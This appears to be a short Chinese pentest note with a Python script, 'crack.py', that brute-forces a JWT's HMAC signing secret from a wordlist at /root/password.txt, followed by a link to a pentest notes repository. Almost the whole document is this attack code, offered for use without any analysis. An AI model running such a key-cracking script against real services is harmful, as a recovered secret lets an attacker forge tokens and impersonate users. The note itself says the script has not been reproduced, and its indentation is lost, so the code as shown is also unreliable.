还未复现,看看思路
>pip3 install pyjwt
>python3 crack.py
import jwt
import termcolor
jwt_str = R'token'
with open('/root/password.txt') as f:
for line in f:
key_ = line.strip()
try:
jwt.decode(jwt_str,verify=True,key=key_)
print('\r','\bfound key -->',termcolor.colored(key_,'green'),'<--')
break
except(jwt.exceptions.ExpiredSignatureError,jwt.exceptions.InvalidAudienceError,jwt.exceptions.InvalidIssuedAtError,jwt.exceptions.InvalidIssuedAtError,jwt.exceptions.ImmatureSignatureError):
print('\r','\bfound key -->',termcolor.colored(key_,'green'),'<--')
except jwt.exceptions.InvalidSignatureError:
print('\r',' ' * 64, '\r\btry',key_,end='',flush=True)
continue
else:
print('\r','\bnot found.')
参考:https://github.com/xiaoy-sec/Pentest_Note#%E6%B0%B4%E5%9D%91%E6%94%BB%E5%87%BB
